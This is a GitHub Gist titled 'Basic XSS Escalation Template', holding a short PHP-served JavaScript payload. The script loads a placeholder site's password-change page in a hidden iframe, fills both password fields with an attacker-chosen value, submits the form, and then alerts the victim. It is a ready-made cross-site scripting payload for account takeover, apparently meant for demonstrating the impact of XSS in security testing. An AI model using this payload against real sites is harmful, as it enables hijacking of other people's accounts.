Created
January 17, 2019 15:05
-
-
Save Rhynorater/dfff0569e66cf068493b57ed34051113 to your computer and use it in GitHub Desktop.
Basic XSS Escalation Template
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| header("Content-Type: application/javascript"); | |
| ?> | |
| frame=document.createElement("iframe") | |
| frame.addEventListener("load", function() { | |
| setTimeout(function(){ | |
| //Once the iframe loads, give it 1 second to load the DOM | |
| frame.contentDocument.getElementById("NewPassword").value="1337H4x0rz!!!" | |
| //Set new password | |
| frame.contentDocument.getElementById("ConfirmNewPassword").value="1337H4x0rz!!!" | |
| //Set confirm password | |
| frame.contentDocument.getElementById("SubmitButton").click() | |
| //Click the submit button | |
| setTimeout(function(){ | |
| //Wait a couple seconds for the previous request to be sent | |
| alert("Your account password has been changed to 1337H4x0rz!!!") | |
| }, 2000) | |
| }, 1000) | |
| }); | |
| //Create iframe and append it body | |
| frame.src="https://vulnerableSite.com/sensative/action.php" | |
| document.body.append(frame) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment